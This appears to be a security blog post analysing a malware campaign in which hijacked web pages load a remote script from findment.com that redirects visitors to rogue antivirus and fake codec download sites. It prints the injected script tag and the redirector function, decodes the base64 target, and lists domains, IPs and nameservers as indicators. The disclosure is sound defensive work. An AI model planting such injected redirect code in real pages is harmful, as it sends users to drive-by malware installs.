The domains findment.com, megazony.com, and megahaty.com, recently registered, are redirecting users to websites intended to get the user to install a rogue program or video codec.
Within the hijacked webpage includes a script to load the redirector:
<script language=”JavaScript” src=”http://findment.com/942023.js?sid=
bWl6emRvX21pc3NpbmdsYWIuZmluZG1lbnQuY29t”></script>
The contents of the script are below. The sid variable is a base64 encoded URL of where to go with the redirection.
bWl6emRvX21pc3NpbmdsYWIuZmluZG1lbnQuY29t = mizzdo_missinglab.findment.com.
function LoadAd() {
parent.location.href=”http://mizzdo_missinglab.findment.com/index.html?
Ref=”+encodeURIComponent(document.referrer);
}
LoadAd();
This new URL will then redirect the user to known malware installation websites (advanedmalwarescanner.com, malwareliveproscanv1.com, and my-xxx-video.com just to name a few). I seemed to find a lot of the URL’s responsible for the redirection were from 5webs.net. This website appears to be a legitimate webhost that offers free accounts. There are potentially 21,000 webpages infected according to a Google search. I went through MANY of the results shown from the link and almost all of them redirected to a drive-by download. The html of the pages will show keywords from “Patrick Swayze Dead” (see earlier post as well) to “Missing Link found” all relating to current events. I found that there were several domains responsible and they have similar whois information, all but one were registered today.
Whois entry for findment.com (78.159.98.58)
Whois entry for megazony.com (212.95.56.90)
Whois entry for megahaty.com (78.159.98.58)
NAMESERVERS:
ns1.itsfreedns.com (94.75.213.190)
ns2.itsfreedns.com (212.95.32.72)
ns3.itsfreedns.com (94.76.206.7)
UPDATED:
New domain found using this technique to infect users through search results.
Whois entry for zonement.com 94.76.205.184
2 Responses to “findment.com, megazony.com, megahaty.com distributing rogue malware”
Leave a Reply
You must login to post a comment.